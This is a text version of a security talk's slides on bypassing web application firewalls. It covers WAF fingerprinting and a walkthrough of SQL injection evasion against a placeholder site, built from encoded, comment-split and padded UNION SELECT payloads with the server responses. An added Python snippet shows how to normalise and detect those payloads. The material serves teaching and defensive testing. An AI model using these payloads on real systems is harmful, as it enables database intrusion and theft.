WAF Bypassing Techniques
• Avinash Kumar Thapa, Senior Security Analyst at Network Intelligence India
• Bug Hunter on HackerOne
• CTF Author on Vulnhub.com
• Some exploits and PoCs on Exploit-DB as well.
• Passionate about Web Application Security and Exploit Writing.
Agenda
• Introduction to Web Application Firewalls
• Operation Modes
• Vendors
• Fingerprinting WAF
• Ways to Bypass WAFs
• Practical Cases for Bypassing
• Conclusion
Introduction to Web Application Firewalls
• Operates at the application layer.
• Monitors all HTTP/HTTPS/SOAP/XML-RPC web service traffic between clients and servers, based on pre-defined signatures held in a database.
• The basic goal of a WAF is to monitor and block content that violates a pre-defined policy.
• These pre-defined policies are patterns of user input that indicate a potential attack.
• Understands HTTP and HTTPS traffic better than any traditional firewall.
Types of Operation Modes
Negative Model
A negative security model recognizes attacks by relying on a database of known attack signatures.
Example:
Do not allow, in any page, any argument value (user input) that matches potential XSS strings such as <script>, </script>, String.fromCharCode, etc.
Pros:
● Less time to implement.
Cons:
● Less protection.
Positive Model
A positive security model enforces positive behaviour by learning the application logic and building a security policy of valid known requests as a user interacts with the application.
Example:
• On page news.jsp, the field id may only contain the characters [0-9] and only values from 0 to 65535.
• Using intval conditions on the page (accepts only integers).
Pros:
● Better performance (fewer rules).
● Fewer false positives.
Cons:
● Much more time to implement.
● Some vendors provide an "automatic learning mode"; it helps, but is far from perfect. In the end you always need a skilled human to review the policies.
Mixed Model
• Combination of both the positive and the negative model.
Testing Environments
• Google Chrome
• Mozilla Firefox
• Internet Explorer
• Opera Browser
Products
• F5 BIG-IP WAF
• Sucuri
• ModSecurity
• Imperva Incapsula
• PHP-IDS (PHP Intrusion Detection System)
• Quick Defense
• AQTRONIX WebKnight (for IIS, based on ISAPI filters)
• Barracuda WAF
Fingerprinting WAF
• By cookies added to the HTTP communication, e.g. Citrix NetScaler WAF and F5 BIG-IP ASM.
  [Slide images of the NetScaler and BIG-IP ASM cookies are not reproduced here]
• On the basis of the HTTP response: other WAFs may be detected by the type of HTTP response received when a malicious request is submitted; the response varies from one WAF to another. Some of the common responses are 403, 406, 419, 500, 501, etc.
  [Slide images not reproduced here: response for F5 BIG-IP; request and response for ModSecurity; response for WebKnight, raw and as rendered in the browser]
Automatic Fingerprinting WAF
• Using Nmap scripts:
nmap -p80 --script http-waf-detect <host>
• Using wafw00f (the URL is a positional argument):
python wafw00f.py <URL>
Techniques to Bypass WAFs
• Bypassing WAF for SQL injection vulnerabilities
• Bypassing WAF for XSS issues
• Bypassing WAF for LFI and RFI vulnerabilities
General Techniques to Bypass WAF
• Null character injection
• Mixed case
• Inline comments
• Chunked requests
• Buffer overflow
• HTTP parameter pollution
• URL encoding
• Keyword splitting
• Replaced keywords
• Ignoring cookies
• Using data URIs
• Header injection
Bypassing WAF for SQL Injection Vulnerabilities
https://abc.com/index.php?id=1
Example 1 (without WAF)
https://abc.com/index.php?id=1 '
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6
Example 1 (with WAF)
https://abc.com/index.php?id=1 '
HTTP/1.1 403 Forbidden
or HTTP/1.1 406 Not Acceptable
or HTTP/1.1 404 Not Found
or HTTP/1.1 500 Internal Server Error
or HTTP/1.1 400 Bad Request
Some recon on the WAF
Recon showed that ModSecurity is in use.
https://abc.com/index.php?id=1 "
HTTP/1.1 200 OK
https://abc.com/index.php?id=1 %27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' ' at line 6
This technique is URL encoding.
Sometimes you need to use:
1) Double URL encoding: %2527 → %27 → '
2) Triple URL encoding: %252525 → %2527 → %27 → ' (a very rare case)
https://abc.com/index.php?id=1 %27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Is the 'ORDER' keyword blocked?
• Is the 'ORDER BY' keyword blocked?
• Is there any alternative to an ORDER BY query?
• Are spaces blocked?
Let's try
https://abc.com/index.php?id=1 %27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind
• 'ORDER' keyword is blocked
• Check again: is 'ORDER' really blocked?
https://abc.com/index.php?id=1 %27ORDER%23
HTTP/1.1 200 OK
New assumptions in mind
• 'ORDER' keyword is not blocked
• What is blocked then?
SPACES ARE BLOCKED
https://abc.com/index.php?id=1 %27 ORDER by 1 %23
HTTP/1.1 403 Forbidden
https://abc.com/index.php?id=1 %27ORDERby1 %23
HTTP/1.1 200 OK
No assumptions left in mind: only spaces are blocked.
Techniques to bypass spaces
• Using '+' instead of a space, e.g. order+by+1 (mostly blocked)
• Using inline comments '/**/' instead of spaces, e.g. order/**/by/**/1
• Using a combination of inline comments and URL encoding instead of spaces, e.g.:
  • Order/%2a%2a/by/%2a%2a/1
  • Order%2f**%2fby%2f**%2f1
• Using a combination of inline comments, URL encoding and junk characters instead of spaces, e.g.:
  • Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
  • Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
• Using white space characters %0a, %0b, %0c, %0d, %a0, %09, %01; the query becomes:
  • ORDER%0aby%0a1
  • ORDER%0bby%0b1
  • ORDER%0cby%0c1
  • ORDER%0Dby%0D1
  • ORDER%A0by%A01
  • ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php?id=1 %27/**/ORDER/**/by/**/1%23
HTTP/1.1 200 OK
Let's suppose the number of columns is 3.
https://abc.com/index.php?id=1 %27 UNION SELECT 1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Are 'spaces' blocked?
https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• 'Spaces' were bypassed using inline comments... still blocked?
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are 'integers' blocked?
• Are 'commas' blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?
Techniques to Bypass
Using inline comments (MySQL version-conditional comments):
• /*!50000UNION*/
• /*!40000UNION*/
• /*!00000UNION*/
If UNION is blocked, using URL encoding techniques:
• %55nion
• %2555nion (double URL encoding)
• %55%4e%49%4f%4e (UNION)
Double and triple URL encoding can be applied in the same way.
https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1 %27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Is the 'UNION' keyword blocked?
• Is the 'SELECT' keyword blocked?
• Are 'integers' blocked?
• Are 'commas' blocked?
• Is the combination "UNION SELECT" blocked?
• Is "SELECT with integers" blocked?
https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1 %27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind: unchanged from the list above.
https://abc.com/index.php?id=1 %27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1 %27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind
• 'UNION' keyword is NOT blocked.
• 'SELECT' keyword is NOT blocked.
• 'Integers' are NOT blocked.
• 'Commas' are NOT blocked.
• Combination of "UNION SELECT" is blocked?
• "SELECT with integers" is NOT blocked.
Techniques to bypass the combination "UNION SELECT"
Using a combination of inline comments and URL encoding:
• /*!50000%55niOn*/ /*!50000%53eLECT*/
Using white space characters and URL-encoded comments (#):
• Union%23%0aSELECT
• Union%23%0bSELECT
• Union%23%0cSELECT
• Union%23%0DSELECT
• Union%23%A0SELECT
Techniques to bypass the combination "UNION SELECT"
Using buffer overflow (a long run of junk inside a # comment, terminated by %0A):
UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Sometimes the amount of junk needs to be increased as required:
UNION%23XXXX...XXXX%0ASELECT   (several hundred X characters in place of XXXX...XXXX)
Techniques to bypass the combination "UNION SELECT"
Using the DISTINCT statement: UNION DISTINCT SELECT
Using the DISTINCTROW statement: UNION DISTINCTROW SELECT
https://abc.com/index.php?id=1 %27/**/UNION%23XXXX...XXXX%0ASELECT/**/1,2,3%23   (several hundred X characters in place of XXXX...XXXX)
HTTP/1.1 200 OK
Special case: what if commas are blocked?
https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• 'UNION' keyword is NOT blocked.
• 'SELECT' keyword is NOT blocked.
• 'Integers' are NOT blocked.
• 'Commas' are blocked.
• Combination of "UNION SELECT" is NOT blocked?
• "SELECT with integers" is NOT blocked.
Time to bypass commas ",".
Basic Bypasses
• URL encoding: %2c → ,
• Double URL encoding: %252c → %2c → ,
• Using inline comments /*!*/, e.g. UNION SELECT 1/*!,*/2
Advanced way to bypass "commas"
• Using JOIN
• JOIN is used to add columns, as UNION is used to add rows.
• We have SELECT 1,2,3
• SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
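As an added example (not code from the slides), the two operation modes described under Types of Operation Modes applied to the id parameter of the walkthrough above: a positive-model allowlist for the news.jsp-style integer id, and a negative-model signature check that first normalises the value (repeated URL decoding, MySQL comment handling, whitespace folding) the way ModSecurity's transformations do, so the space, comment, encoding, junk-comment and DISTINCTROW variants shown above all collapse back to UNION SELECT. The payload list is constructed from the URLs on this page; the signature regexes are my own simplification, not any vendor's rule set.

```python
import re
from urllib.parse import unquote
# Constructed "id" values taken from the URLs in the walkthrough above, plus one benign value.
PAYLOADS = [
    "1 %27 ORDER BY 1%23",
    "1 %27/**/ORDER/**/by/**/1%23",
    "1 %27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23",
    "1 %27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23",
    "1 %27 UNION%23XXXX%0ASELECT/**/1,2,3%23",
    "1 %27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23",
    "1 %27UNION%0aDISTINCTROW%0bSELECT%0c1%23",
    "42",
]

# Negative model: simplified signatures (my own, not a vendor rule set) applied after normalisation.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b(\s+(all|distinct|distinctrow))?\s+select\b"),
    "order-by": re.compile(r"\border\s+by\b"),
}

def normalize(value: str) -> str:
    """Fold the evasions shown above back to canonical SQL before matching."""
    # Decode repeatedly so %2527 -> %27 -> ' ; latin-1 keeps %A0 as the single byte MySQL sees.
    for _ in range(3):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    # MySQL executes the body of /*!50000 ... */ comments, so keep the body; plain /**/ is a separator.
    value = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # A '#' comment ends at the newline, which is why UNION%23junk%0ASELECT still parses as UNION SELECT.
    value = re.sub(r"#[^\n]*\n", " ", value)
    # Collapse every whitespace variant MySQL accepts (tab, LF, VT, FF, CR, 0xA0) into one space.
    return re.sub(r"\s+", " ", value).strip().lower()

def negative_model(value: str) -> list:
    norm = normalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]
def positive_model(value: str) -> bool:
    """news.jsp policy from the slides: id is [0-9] only, 0..65535, checked on the raw (undecoded) value."""
    return re.fullmatch(r"[0-9]{1,5}", value) is not None and int(value) <= 65535

def verdict(value: str) -> str:
    """Mixed model: the allowlist decides first; signatures only judge what the allowlist rejected."""
    if positive_model(value):
        return "allow"
    hits = negative_model(value)
    return "block:" + ",".join(hits) if hits else "suspicious"
```

Note that positive_model never decodes: an allowlist on the raw value is immune to every encoding trick in the deck, which is why the positive model is the stronger control where the application's inputs are well understood.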
Similar Approach for Other Vulnerabilities
• For XSS
• For LFI / RFI
DEMO TIME
References
• Images in slides 10, 11, 14, 15, 16, 17 taken from http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf
Thank you..!

Editor's note (slide 11): ISAPI filters are the DLLs used to extend the functionality of the IIS server; they are only available on IIS servers.